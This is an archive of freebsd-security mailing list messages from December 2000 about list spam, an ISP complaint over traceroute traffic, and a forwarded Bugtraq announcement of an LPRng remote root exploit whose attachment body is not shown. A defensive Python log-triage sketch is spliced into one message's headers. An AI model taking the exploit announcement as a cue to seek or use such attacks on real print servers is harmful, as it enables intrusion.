If it is legal to do this then this may be the solution. It may also help with some needed funds for the FreeBSD project at the expense of individuals and corporations misusing the list.

Thanks for all the tips and replies to security related issues in 2000

Regards
Tim

From owner-freebsd-security Thu Dec 14 15:11:34 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:11:32 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from icarus.cs.brandeis.edu (icarus.cs.brandeis.edu [129.64.3.180]) by hub.freebsd.org (Postfix) with ESMTP id 0785E37B400 for ; Thu, 14 Dec 2000 15:11:32 -0800 (PST) Received: from localhost (meshko@localhost) by icarus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id SAA08946; Thu, 14 Dec 2000 18:11:19 -0500 Date: Thu, 14 Dec 2000 18:11:19 -0500 (EST)
From: Mikhail Kruk To: Tim McCullagh Cc: freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: <012701c06620$e3f450c0$6500a8c0@halenet.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@icarus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

it'd be darn awesome if some judge would make precedent of making someone pay after such warning.
of course this will never happen.
On the other hand if you make the amount more reasonable (like $50 or whatever you are getting paid at your job) you probably can take this to a court and win...

> >>>>>>>>>>
> NOTICE: By sending unsolicited commercial advertising/solicitations
> (or otherwise on or as part of a mailing list) to the above e-mail
> address you will be indicating your consent to paying Danick Systems
> a Limited Liability Corporation and controller of this domain
> $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent
> dealing with it. Payment due in 30 days upon receipt of an invoice
> (e-mail or regular mail) from me or my authorized representative.
> <<<<<<<<<<<

From owner-freebsd-security Thu Dec 14 15:18:47 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:18:44 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 9E8C037B400 for ; Thu, 14 Dec 2000 15:18:43 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id eBENHdX73671; Thu, 14 Dec 2000 18:17:39 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Thu, 14 Dec 2000 18:17:39 -0500 (EST)
From: Rob Simmons To: Mikhail Kruk Cc: Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Maybe if the list uses some combination of orbs, rlb, rss, dul; restricts posting to subscribers; and makes any submissions on the website through forms and not mailto:'s it would help cut down on the spam. The blackhole lists could be optional, I just thought I'd throw them out :)

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Thu, 14 Dec 2000, Mikhail Kruk wrote:

> it'd be darn awesome if some judge would make precedent of making someone
> pay after such warning.
> of course this will never happen.
> On the other hand if you make the amount more reasonable (like $50 or
> whatever you are getting paid at your job) you probably can take this to a
> court and win...
>
> > >>>>>>>>>>
> > NOTICE: By sending unsolicited commercial advertising/solicitations
> > (or otherwise on or as part of a mailing list) to the above e-mail
> > address you will be indicating your consent to paying Danick Systems
> > a Limited Liability Corporation and controller of this domain
> > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent
> > dealing with it. Payment due in 30 days upon receipt of an invoice
> > (e-mail or regular mail) from me or my authorized representative.
> > <<<<<<<<<<<

From owner-freebsd-security Thu Dec 14 15:34:56 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:34:52 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id A579D37B400 for ; Thu, 14 Dec 2000 15:34:48 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id SAA81592; Thu, 14 Dec 2000 18:36:12 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Thu, 14 Dec 2000 18:36:12 -0500 (EST)
From: Ralph Huntington To: Rob Simmons Cc: Mikhail Kruk , Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Could you PLEASE take this discussion off the list. Please.

On Thu, 14 Dec 2000, Rob Simmons wrote:

> Maybe if the list uses some combination of orbs, rlb, rss, dul; restricts
> posting to subscribers; and makes any submissions on the website through
> forms and not mailto:'s it would help cut down on the spam. The blackhole
> lists could be optional, I just thought I'd throw them out :)
>
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/
>
> On Thu, 14 Dec 2000, Mikhail Kruk wrote:
>
> > it'd be darn awesome if some judge would make precedent of making someone
> > pay after such warning.
> > of course this will never happen.
> > On the other hand if you make the amount more reasonable (like $50 or
> > whatever you are getting paid at your job) you probably can take this to a
> > court and win...
> >
> > > >>>>>>>>>>
> > > NOTICE: By sending unsolicited commercial advertising/solicitations
> > > (or otherwise on or as part of a mailing list) to the above e-mail
> > > address you will be indicating your consent to paying Danick Systems
> > > a Limited Liability Corporation and controller of this domain
> > > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent
> > > dealing with it. Payment due in 30 days upon receipt of an invoice
> > > (e-mail or regular mail) from me or my authorized representative.
> > > <<<<<<<<<<<

From owner-freebsd-security Thu Dec 14 15:42: 1 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 15:41:58 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from inetarena.com (ns1.inetarena.com [206.129.216.1]) by hub.freebsd.org (Postfix) with ESMTP id 8CE7737B400 for ; Thu, 14 Dec 2000 15:41:53 -0800 (PST) Received: from localhost (sparky@localhost) by inetarena.com (8.9.3/8.8.5) with ESMTP id PAA32577; Thu, 14 Dec 2000 15:41:32 -0800 Date: Thu, 14 Dec 2000 15:41:32 -0800 (PST)
From: To: Mikhail Kruk Cc: Tim McCullagh , freebsd-security@FreeBSD.ORG Subject: Re: OT Spamming on this list of late In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, 14 Dec 2000, Mikhail Kruk wrote:

> it'd be darn awesome if some judge would make precedent of making someone
> pay after such warning.
> of course this will never happen.

Incidents like this have been handled successfully with this sort of plan and Judges have found for the plaintiffs in these cases. Mainly the cases have to do with phone and junk snail mail. Here is what needs to happen to have a chance at success.

If the spamming company is in the U.S. you would need to send a Certified Letter to that company explaining the details of the deal. The Certified Letter, since it must be signed for is your proof that the mail has been delivered. Then the letter must state why the charge is being made. In this case I would explain that this is a professional, non-profit email list, and that they are more than welcome to spam to it, if they are a sponsor. Then, make the terms of acceptance of being a sponsor the act of sending spam to the list. This notice will also need to be in the sign-up procedure for gaining access to the list.

Basically, you are setting up a sponsorship from a for profit company to a non-profit organization. I would, and I just bet you a dollar there is one lawyer on this list, find a lawyer to write this up.

=====================================================
Back in Santa School they taught me everything.
Don't go HO HO HO it scares the little children.
Don't promise anything and don't flirt with the moms.
Remove the costume before you hit the bar.
No, it don't feel like Christmas.
local $_ = "0A72656B636148206C72655020726568746F6E41207473754A"; while(s/..$//) { print chr(hex($&)) }
=====================================================

> On the other hand if you make the amount more reasonable (like $50 or
> whatever you are getting paid at your job) you probably can take this to a
> court and win...
>
> > >>>>>>>>>>
> > NOTICE: By sending unsolicited commercial advertising/solicitations
> > (or otherwise on or as part of a mailing list) to the above e-mail
> > address you will be indicating your consent to paying Danick Systems
> > a Limited Liability Corporation and controller of this domain
> > $10,000.oo U.S.D./hour for a minimum of 1 hour for my time spent
> > dealing with it. Payment due in 30 days upon receipt of an invoice
> > (e-mail or regular mail) from me or my authorized representative.
> > <<<<<<<<<<<

From owner-freebsd-security Thu Dec 14 17:29:36 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:29:33 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 8F3B337B400 for ; Thu, 14 Dec 2000 17:29:32 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id UAA31350 for ; Thu, 14 Dec 2000 20:29:31 -0500 Date: Thu, 14 Dec 2000 20:29:31 -0500 (EST)
From: Mikhail Kruk To: Subject: mindspring complains about intrusive port scans Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: meshko@daedalus.cs.brandeis.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi I got the following message from my DSL provider. I think that the logs they show are caused by me running ping and traceroute on some host on their network. (note that I've substituted my ip by xxx.xxx.xxx.xxx in the logs just in case) So my questions are: a) is there any chance that I'm wrong and this log is not caused by ping/traceroute? b) can they accuse me of violating anything because I run traceroute? Sounds like bs to me... included message: From abuse@mindspring.net Thu Dec 14 20:23:57 2000 Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) 
From: abuse@mindspring.net To: bkruk@ix.netcom.com Subject: Issue 001214-18234395 Hello, We have recently received a complaint of intrusive port scans. Upon investigating, we have determined that this alleged abuse is originating from your account. In a case like this, we like to let you know about the report, so that you may take a moment to review our policies regarding network unfriendly activity and netiquette. It is our hope that by notifying you of the report, we are helping to avoid any further incidents of this nature. Please view our appropriate use policy, it is available at: http://www.mindspring.net/aboutms/policy.html Pay particular attention to the following section: "Privacy violations: Attempts, whether successful or unsuccessful, to gain access to any electronic systems, networks or data, without proper consent, are prohibited." These types of cases are often escalated by some sort of misunderstanding, by keeping us informed, you will be helping us avoid that. Regards, Erich Hablutzel EarthLink/MindSpring AUP Abuse Investigator ----------------------------------------------------------------------------- portion of logs detailing incident: FWIN,2000/12/11,18:39:54 +10:00 GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP FWIN,2000/12/11,18:40:16 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP FWIN,2000/12/11,18:40:20 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP WIN,2000/12/11,18:40:26 +10:00 GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP ----------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:32:54 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:32:51 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id 3934F37B400 for ; Thu, 14 
Dec 2000 17:32:49 -0800 (PST) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 146jjv-0000Az-00; Fri, 15 Dec 2000 03:32:51 +0200 Date: Fri, 15 Dec 2000 03:32:51 +0200 (IST) From: Roman Shterenzon To: Mikhail Kruk Cc: Subject: Re: mindspring complains about intrusive port scans In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seems like traceroute to me, and I don't see anything violative here. They're just not used to udp traceroute I guess. Windows uses icmp traceroutes. On Thu, 14 Dec 2000, Mikhail Kruk wrote: > Hi > I got the following message from my DSL provider. > I think that the logs they show are caused by me running ping and > traceroute on some host on their network. (note that I've substituted my > ip by xxx.xxx.xxx.xxx in the logs just in case) > > So my questions are: > a) is there any chance that I'm wrong and this log is not caused by > ping/traceroute? > b) can they accuse me of violating anything because I run traceroute? > Sounds like bs to me... > > included message: > > >From abuse@mindspring.net Thu Dec 14 20:23:57 2000 > Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) 
> From: abuse@mindspring.net > To: bkruk@ix.netcom.com > Subject: Issue 001214-18234395 > > Hello, > > We have recently received a complaint of intrusive port scans. Upon > investigating, we have determined that this alleged abuse is originating > from your account. In a case like this, we like to let you know about the > report, so that you may take a moment to review our policies regarding > network unfriendly activity and netiquette. It is our hope that by > notifying you of the report, we are helping to avoid any further incidents > of this nature. > > Please view our appropriate use policy, it is available at: > > http://www.mindspring.net/aboutms/policy.html > > Pay particular attention to the following section: > > "Privacy violations: > Attempts, whether successful or unsuccessful, to gain access to any > electronic systems, networks or data, without proper consent, are > prohibited." > > These types of cases are often escalated by some sort of misunderstanding, > by keeping us informed, you will be helping us avoid that. > > Regards, > > Erich Hablutzel > > EarthLink/MindSpring AUP Abuse Investigator > > ----------------------------------------------------------------------------- > > portion of logs detailing incident: > > > FWIN,2000/12/11,18:39:54 +10:00 > GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP > > FWIN,2000/12/11,18:40:16 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP > > FWIN,2000/12/11,18:40:20 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP > > WIN,2000/12/11,18:40:26 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP > ----------------------------------------------------------------------------- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:33: 9 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:32:54 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 74E9537B404 for ; Thu, 14 Dec 2000 17:32:54 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id RAA18135; Thu, 14 Dec 2000 17:32:38 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda18133; Thu Dec 14 17:32:18 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBF1W7e04581; Thu, 14 Dec 2000 17:32:07 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdRj4575; Thu Dec 14 17:31:26 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBF1VPa05764; Thu, 14 Dec 2000 17:31:25 -0800 (PST) Message-Id: <200012150131.eBF1VPa05764@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdvE5760; Thu Dec 14 17:30:54 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
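
The abuse report quoted in the "mindspring complains about intrusive port scans" messages above logs one ICMP packet and three UDP packets to consecutive ports 33489-33491 from a single source port. The following Python triage sketch is an added example, not part of any message in the thread; it assumes classic UDP traceroute defaults (base port 33434, three probes per hop, maximum TTL 30), and its sample addresses and the contrasting scan log are constructed.

```python
import math
import re
from collections import defaultdict

# Classic UDP traceroute defaults. These are assumptions of this example,
# not values stated in the thread.
BASE_PORT = 33434        # probe number n is sent to UDP port BASE_PORT + n
PROBES_PER_HOP = 3
MAX_TTL = 30

LINE_RE = re.compile(
    r"^(?P<tag>\w+),(?P<date>\d{4}/\d\d/\d\d),(?P<time>\d\d:\d\d:\d\d)[^,]*,"
    r"(?P<src>[^,:]+):(?P<sport>\d+),(?P<dst>[^,:]+):(?P<dport>\d+),"
    r"(?P<proto>\w+)$"
)

# Constructed sample modelled on the four log lines in the abuse report:
# same timestamps, ports and destination; the redacted source is replaced by
# a documentation address. The last line's "WIN" tag is kept as quoted.
REPORTED = """\
FWIN,2000/12/11,18:39:54 +10:00 GMT,192.0.2.10:0,203.164.30.182:0,ICMP
FWIN,2000/12/11,18:40:16 +10:00 GMT,192.0.2.10:41374,203.164.30.182:33489,UDP
FWIN,2000/12/11,18:40:20 +10:00 GMT,192.0.2.10:41374,203.164.30.182:33490,UDP
WIN,2000/12/11,18:40:26 +10:00 GMT,192.0.2.10:41374,203.164.30.182:33491,UDP
"""

# Constructed contrast case: one source walking unrelated service ports.
SCAN = """\
FWIN,2000/12/11,19:02:01 +10:00 GMT,192.0.2.77:3120,198.51.100.7:21,TCP
FWIN,2000/12/11,19:02:01 +10:00 GMT,192.0.2.77:3121,198.51.100.7:23,TCP
FWIN,2000/12/11,19:02:01 +10:00 GMT,192.0.2.77:3122,198.51.100.7:25,TCP
FWIN,2000/12/11,19:02:02 +10:00 GMT,192.0.2.77:3123,198.51.100.7:80,TCP
FWIN,2000/12/11,19:02:02 +10:00 GMT,192.0.2.77:3124,198.51.100.7:111,TCP
"""


def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
            records.append(rec)
    return records


def probe_hop(dport):
    """TTL a classic traceroute probe to this port was sent with, or None."""
    seq = dport - BASE_PORT
    if not 1 <= seq <= MAX_TTL * PROBES_PER_HOP:
        return None
    return math.ceil(seq / PROBES_PER_HOP)


def classify(records):
    """Label each (src, dst) pair from the ports it touched, in log order."""
    flows = defaultdict(list)
    for rec in records:
        flows[(rec["src"], rec["dst"])].append(rec)
    verdicts = {}
    for pair, recs in flows.items():
        probes = [r for r in recs if r["proto"] != "ICMP"]
        ports = [r["dport"] for r in probes]
        if not probes:
            verdicts[pair] = "icmp-only"
        elif (all(r["proto"] == "UDP" for r in probes)
              and all(probe_hop(p) is not None for p in ports)
              and len({r["sport"] for r in probes}) == 1
              and all(b - a == 1 for a, b in zip(ports, ports[1:]))):
            # One source port, UDP only, destination ports stepping by one
            # inside the traceroute window: path tracing, not service probing.
            verdicts[pair] = "traceroute-like"
        elif len(set(ports)) >= 5:
            verdicts[pair] = "scan-like"
        else:
            verdicts[pair] = "unclassified"
    return verdicts


if __name__ == "__main__":
    for name, text in (("reported", REPORTED), ("scan", SCAN)):
        recs = parse_log(text)
        hops = sorted({probe_hop(r["dport"]) for r in recs if r["proto"] == "UDP"})
        print(name, classify(recs), "hops:", hops)
```

Under those assumptions all three reported UDP probes map to the same hop, which is what one hop's worth of traceroute probes looks like when it reaches the destination firewall.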
From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.2-RELEASE X-Sender: cy To: desmo@bandwidth.org Cc: freebsd-security@freebsd.org Subject: LPRng remote root exploit (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 14 Dec 2000 17:30:52 -0800 Sender: cy@uumail.gov.bc.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is just a heads up. Anyone care to test this with our LPRng port? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message Return-Path: cschuber@osg.gov.bc.ca Delivery-Date: Thu Dec 14 15:08:20 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eBEN8Kk00964 for ; Thu, 14 Dec 2000 15:08:20 -0800 (PST) Received: from passer9.cwsent.com(10.2.2.2), claiming to be "passer.osg.gov.bc.ca" via SMTP by cwsys9.cwsent.com, id smtpdcQt962; Thu Dec 14 15:08:00 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEN7xT00432 for ; Thu, 14 Dec 2000 15:07:59 -0800 (PST) Resent-Message-Id: <200012142307.eBEN7xT00432@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdDAC411; Thu Dec 14 15:06:58 2000 Delivery-Date: Thu, 14 Dec 2000 15:06:58 -0800 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.1/8.9.1) id eBEN6sJ00368 for ; Thu, 14 Dec 2000 15:06:54 -0800 (PST) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdE33438; Thu Dec 14 15:04:34 2000 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id PAA17775 for ; Thu, 14 Dec 2000 15:04:34 -0800 Received: from lists.securityfocus.com(207.126.127.68) via SMTP by point.osg.gov.bc.ca, id smtpda17773; Thu Dec 14 15:04:15 2000 Received: from lists.securityfocus.com (lists.securityfocus.com 
[207.126.127.68]) by lists.securityfocus.com (Postfix) with ESMTP id EB6BF24D4A8; Thu, 14 Dec 2000 14:41:40 -0800 (PST) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 20339565 for BUGTRAQ@LISTS.SECURITYFOCUS.COM; Thu, 14 Dec 2000 14:39:42 -0800 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by lists.securityfocus.com (Postfix) with SMTP id E599424E3D8 for ; Wed, 13 Dec 2000 18:42:50 -0800 (PST) Received: (qmail 22081 invoked by alias); 14 Dec 2000 02:42:47 -0000 Delivered-To: bugtraq@securityfocus.com Received: (qmail 22035 invoked from network); 14 Dec 2000 02:42:41 -0000 Received: from host18083.websa.com.ar (HELO powerhouse.is.penguinpowered.com.ar) (200.45.18.83) by mail.securityfocus.com with SMTP; 14 Dec 2000 02:42:41 -0000 Received: from localhost (venomous@localhost) by powerhouse.is.penguinpowered.com.ar (8.9.3/8.9.3) with ESMTP id XAA03033 for ; Wed, 13 Dec 2000 23:41:26 -0300 X-Authentication-Warning: powerhouse.is.penguinpowered.com.ar: venomous owned process doing -bs X-Sender: venomous@powerhouse.is.penguinpowered.com.ar MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-1307901943-976761685=:2 576" Message-ID: Date: Wed, 13 Dec 2000 23:41:25 -0300 Reply-To: venomous Sender: Bugtraq List 
From: venomous Subject: LPRng remote root exploit To: BUGTRAQ@SECURITYFOCUS.COM Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Thu, 14 Dec 2000 15:06:58 -0800 Resent-From: Cy Schubert This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. - --8323328-1307901943-976761685=:2576 Content-Type: TEXT/PLAIN; charset=US-ASCII LPRng-3.6.22/23/24 remote root exploit, enjoy. venomous of rdC venomous@rdcrew.com.ar http://www.rdcrew.com.ar - --8323328-1307901943-976761685=:2576 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rdC-LPRng.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="rdC-LPRng.c"
- --8323328-1307901943-976761685=:2576-- ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:40: 3 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:39:58 2000 Return-Path: Delivered-To: 
freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 7022E37B400 for ; Thu, 14 Dec 2000 17:39:57 -0800 (PST) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id SAA00368; Thu, 14 Dec 2000 18:39:54 -0700 (MST) Message-Id: <200012150139.SAA00368@faith.cs.utah.edu> Subject: Re: mindspring complains about intrusive port scans To: meshko@cs.brandeis.edu (Mikhail Kruk) Date: Thu, 14 Dec 2000 18:39:54 -0700 (MST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Mikhail Kruk" at Dec 14, 2000 08:29:31 PM 
From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: danderse@cs.utah.edu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tell them to contact the person who sent the complaint in and educate them. They should NOT complain that someone tracerouted to or pinged them. Period. This is _normal_ behavior on the Internet. If they don't want to deal with traceroutes or pings, they should block it at their border and be done with it. The increasing port numbers in the high range suggest that it's a traceroute. The person whose IDS reported this system, and then they acted on it blindly, should be bopped on the head. -Dave Lo and behold, Mikhail Kruk once said: > > Hi > I got the following message from my DSL provider. > I think that the logs they show are caused by me running ping and > traceroute on some host on their network. (note that I've substituted my > ip by xxx.xxx.xxx.xxx in the logs just in case) > > So my questions are: > a) is there any chance that I'm wrong and this log is not caused by > ping/traceroute? > b) can they accuse me of violating anything because I run traceroute? > Sounds like bs to me... > > included message: > > >From abuse@mindspring.net Thu Dec 14 20:23:57 2000 > Date: Thu, 14 Dec 2000 17:27:13 -0500 (EST) 
> From: abuse@mindspring.net > To: bkruk@ix.netcom.com > Subject: Issue 001214-18234395 > > Hello, > > We have recently received a complaint of intrusive port scans. Upon > investigating, we have determined that this alleged abuse is originating > from your account. In a case like this, we like to let you know about the > report, so that you may take a moment to review our policies regarding > network unfriendly activity and netiquette. It is our hope that by > notifying you of the report, we are helping to avoid any further incidents > of this nature. > > Please view our appropriate use policy, it is available at: > > http://www.mindspring.net/aboutms/policy.html > > Pay particular attention to the following section: > > "Privacy violations: > Attempts, whether successful or unsuccessful, to gain access to any > electronic systems, networks or data, without proper consent, are > prohibited." > > These types of cases are often escalated by some sort of misunderstanding, > by keeping us informed, you will be helping us avoid that. 
> > Regards, > > Erich Hablutzel > > EarthLink/MindSpring AUP Abuse Investigator > > ----------------------------------------------------------------------------- > > portion of logs detailing incident: > > > FWIN,2000/12/11,18:39:54 +10:00 > GMT,xxx.xxx.xxx.xxx:0,203.164.30.182:0,ICMP > > FWIN,2000/12/11,18:40:16 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33489,UDP > > FWIN,2000/12/11,18:40:20 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33490,UDP > > WIN,2000/12/11,18:40:26 +10:00 > GMT,xxx.xxx.xxx.xxx:41374,203.164.30.182:33491,UDP > ----------------------------------------------------------------------------- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 17:57:52 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 17:57:50 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 7108737B402 for ; Thu, 14 Dec 2000 17:57:50 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id D53F91360E; Thu, 14 Dec 2000 20:57:49 -0500 (EST) Date: Thu, 14 Dec 2000 20:57:49 -0500 
From: Chris Faulhaber To: Cy Schubert - ITSD Open Systems Group Cc: desmo@bandwidth.org, freebsd-security@freebsd.org Subject: Re: LPRng remote root exploit (fwd) Message-ID: <20001214205749.A48180@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Cy Schubert - ITSD Open Systems Group , desmo@bandwidth.org, freebsd-security@freebsd.org References: <200012150131.eBF1VPa05764@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200012150131.eBF1VPa05764@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Thu, Dec 14, 2000 at 05:30:52PM -0800 Sender: cdf.lists@fxp.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Dec 14, 2000 at 05:30:52PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > This is just a heads up. > > Anyone care to test this with our LPRng port? > *snip* > > LPRng-3.6.22/23/24 remote root exploit, enjoy. > *snip* It won't hurt to try, however, ports/sysutils/LPRng is at 3.6.26, which is supposed to fix this problem. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Dec 14 20:44: 4 2000 From owner-freebsd-security@FreeBSD.ORG Thu Dec 14 20:44:01 2000 Return-Path: 